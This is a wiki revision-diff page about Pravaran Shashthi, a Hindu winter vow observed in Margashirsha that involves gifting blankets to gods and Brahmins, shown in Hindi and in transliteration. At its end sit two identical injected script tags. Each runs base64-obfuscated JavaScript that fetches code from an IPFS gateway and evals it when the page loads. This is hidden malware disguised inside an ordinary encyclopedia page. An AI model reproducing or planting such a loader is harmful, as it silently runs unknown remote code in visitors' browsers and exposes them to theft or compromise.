Difference between revisions of "प्रावरण षष्ठी"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
m (Text replace - ")</ref" to "</ref")
 
Line 1: Line 1:
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक [[व्रत]] संस्कार है।  
 
*[[मार्गशीर्ष]] [[षष्ठी]] पर होता है।
 
*[[मार्गशीर्ष]] [[षष्ठी]] पर होता है।
*जाड़े से बचने के लिए देवों एवं ब्राह्मणों को कुछ (यथा–कम्बल) देना चाहिए।<ref>गदाधरपद्धति (कालसार अंश, 84)</ref>
+
*जाड़े से बचने के लिए देवों एवं ब्राह्मणों को कुछ (यथा–कम्बल) देना चाहिए।<ref>गदाधरपद्धति (कालसार अंश, 84</ref>
  
  

Latest revision as of 12:53, 27 July 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • margashirsh shashthi par hota hai.
  • ja de se bachane ke lie devoan evan brahmanoan ko kuchh (yatha–kambal) dena chahie.[1]


tika tippani aur sandarbh

  1. gadadharapaddhati (kalasar aansh, 84

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>